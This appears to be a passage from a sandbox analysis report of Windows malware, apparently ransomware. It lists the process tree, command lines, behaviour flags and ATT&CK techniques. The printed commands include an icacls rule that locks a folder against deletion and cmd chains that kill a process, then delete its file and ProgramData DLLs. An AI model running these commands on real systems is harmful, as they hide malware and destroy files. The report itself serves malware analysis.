    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 8452
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 7848
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 5648
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
[1] C:\Users\Admin\AppData\Local\Temp\DC30.exe  PID 10032
    cmdline: C:\Users\Admin\AppData\Local\Temp\DC30.exe
    - Checks processor information in registry
  [2] C:\Windows\SysWOW64\cmd.exe  PID 1180
      cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im DC30.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DC30.exe" & del C:\ProgramData\*.dll & exit
    [3] C:\Windows\SysWOW64\taskkill.exe  PID 9312
        cmdline: taskkill /im DC30.exe /f
        - Kills process with taskkill
    [3] C:\Windows\SysWOW64\timeout.exe  PID 9596
        cmdline: timeout /t 6
        - Suspicious use of SetThreadContext
        - Delays execution with timeout.exe

[1] C:\Users\Admin\AppData\Local\Temp\9C8.exe  PID 5424
    cmdline: C:\Users\Admin\AppData\Local\Temp\9C8.exe
    - Adds Run key to start application
  [2] C:\Windows\SysWOW64\icacls.exe  PID 4124
      cmdline: icacls "C:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      - Modifies file permissions
  [2] C:\Users\Admin\AppData\Local\Temp\9C8.exe  PID 2952
      cmdline: "C:\Users\Admin\AppData\Local\Temp\9C8.exe" --Admin IsNotAutoStart IsNotTask
      - Modifies extensions of user files
    [3] C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin1.exe  PID 10252
        cmdline: "C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin1.exe"
    [3] C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin2.exe  PID 10308
        cmdline: "C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\updatewin2.exe"
    [3] C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe  PID 10360
        cmdline: "C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe"
        - Checks processor information in registry
      [4] C:\Windows\SysWOW64\cmd.exe  PID 11208
          cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3387c87f-24a2-40a6-b0e0-64325b9726ab\5.exe" & del C:\ProgramData\*.dll & exit
        [5] C:\Windows\SysWOW64\taskkill.exe  PID 10424
            cmdline: taskkill /im 5.exe /f
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\timeout.exe  PID 3952
            cmdline: timeout /t 6
            - Delays execution with timeout.exe

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 9556
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class

[1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  PID 10244
    cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\556d392afda3478da4ec127bf67a3d08 /t 0 /p 102441⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"1⤵PID:10956
-
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"2⤵PID:9192
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
- File and Directory Permissions Modification: 1
- Hidden Files and Directories: 1
- Install Root Certificate: 1
- Modify Registry: 4
- Web Service: 1